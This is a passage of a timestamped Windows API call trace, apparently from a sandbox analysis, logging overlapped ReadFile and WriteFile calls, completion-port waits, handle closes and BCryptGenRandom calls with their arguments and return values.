CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.451] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x13e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0180.451] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.460] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0180.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0180.463] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0180.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0181.108] CloseHandle (hObject=0x3cc) returned 1 [0181.108] free (_Block=0x3f70048) [0181.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0181.119] CloseHandle (hObject=0x308) returned 1 [0181.119] free (_Block=0x3e70008) [0181.119] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0181.123] CloseHandle (hObject=0x2a8) returned 1 [0181.123] free (_Block=0x1ff1e60) [0181.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0181.123] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0181.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0181.126] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0181.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.485] CloseHandle (hObject=0x338) returned 1 [0182.486] free (_Block=0x3d70450) [0182.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.492] CloseHandle (hObject=0x3cc) returned 1 [0182.492] free (_Block=0x3f70048) [0182.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.626] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x102b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.631] CloseHandle (hObject=0x3cc) returned 1 [0182.631] free (_Block=0x3df0008) [0182.631] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.641] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa16, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.642] CloseHandle (hObject=0x338) returned 1 [0182.642] free (_Block=0x1ff1e60) [0182.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.654] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb96, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.654] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.654] CloseHandle (hObject=0x3cc) returned 1 [0182.655] free (_Block=0x3df0008) [0182.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.662] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa16, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.662] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.662] CloseHandle (hObject=0x338) returned 1 [0182.663] free (_Block=0x1ff1e60) [0182.663] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.676] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x976, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.676] CloseHandle (hObject=0x338) returned 1 [0182.676] free (_Block=0x3df0008) [0182.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.682] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1b03, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.683] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.686] CloseHandle (hObject=0x3cc) returned 1 [0182.686] free (_Block=0x1ff1e60) [0182.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.697] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf77, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.698] CloseHandle (hObject=0x3cc) returned 1 [0182.699] free (_Block=0x3df0008) [0182.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.701] CloseHandle (hObject=0x3cc) returned 1 [0182.701] free (_Block=0x3df0008) [0182.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.706] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.706] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0182.706] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.707] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0182.707] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.707] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.707] free (_Block=0x3e305b8) [0182.707] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.707] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.707] free (_Block=0x1fa91d0) [0182.707] free (_Block=0x1fa2ed8) [0182.708] free (_Block=0x1fa90b8) [0182.708] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0182.708] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.713] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0182.713] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.726] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0182.726] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0182.735] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0183.656] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x43e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0183.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0183.670] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x412, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0183.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0183.696] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0183.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0183.706] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0183.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0183.714] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0183.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0183.721] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x124a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0183.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0183.735] CloseHandle (hObject=0x170) returned 1 [0183.735] free (_Block=0x3d70450) [0183.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0183.735] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0183.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0184.505] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2313, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0184.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0184.527] CloseHandle (hObject=0x3cc) returned 1 [0184.527] free (_Block=0x3df0008) [0184.527] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0184.545] CloseHandle (hObject=0x170) returned 1 [0184.545] free (_Block=0x3f70048) [0184.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0184.557] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0184.558] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0184.570] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x987, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0184.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0184.582] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x37d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0184.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0184.592] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x516, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0184.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0184.602] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2fd, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0184.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0184.605] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x996, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0184.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.528] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0185.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.543] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0185.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.557] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x3ef, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0185.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.572] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x97f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0185.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.592] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0185.592] 